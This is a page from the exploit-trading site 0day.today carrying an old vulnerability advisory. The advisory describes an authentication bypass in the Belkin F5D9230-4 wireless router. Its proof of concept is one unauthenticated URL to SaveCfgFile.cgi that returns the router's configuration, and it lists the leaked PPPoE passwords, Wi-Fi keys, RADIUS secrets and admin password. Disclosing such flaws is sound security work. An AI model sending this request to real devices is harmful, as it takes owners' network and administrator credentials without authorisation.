0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Belkin Wireless G Plus MIMO Router F5D9230-4 Auth Bypass Vulnerability
[====================================================================== Belkin Wireless G Plus MIMO Router F5D9230-4 Auth Bypass Vulnerability ====================================================================== ## VULNERABILITY: ## ## Belkin Wireless G Plus MIMO Router F5D9230-4 ## Authentication Bypass Vulnerability ## ## ## AUTHOR: ## ## DarkFig < gmdarkfig (at) gmail (dot) com > ## http://acid-root.new.fr/?0:17 ## #acidroot@irc.worldnet.net ## ## ## INTRODUCTION: ## ## I recently bought this router for my local ## network (without modem integrated), now I can tell ## that it was a bad choice. When my ISP disconnects ## me from internet, in the most case I have to reboot ## my Modem and the Router in order to reconnect. ## So I coded a program (which send http packets) to reboot ## my router, it asks me the router password, and reboots it. ## One day I wrote a bad password, but it worked. So I ## decided to make some tests in order to see if there was ## a vulnerability. ## ## ## DESCRIPTION: ## ## Apparently when the router starts, it creates a file ## (without content) named user.conf, then when we go to ## SaveCfgFile.cgi, the configuration is saved to the file ## user.conf. But the problem is that we can access to the ## file SaveCfgFile.cgi without login. ## ## ## PROOF OF CONCEPT: ## ## For example we can get the configuration file here: ## http://<ROUTER_IP>/SaveCfgFile.cgi ## ## pppoe_username=... ## pppoe_password=... ## wl0_pskkey=... ## wl0_key1=... ## mradius_password=... ## mradius_secret=... ## httpd_password=... ## http_passwd=... ## pppoe_passwd=... ## ## ## Tested on the latest firmware for this product ## (version 3.01.53). # 0day.today [2024-11-16] #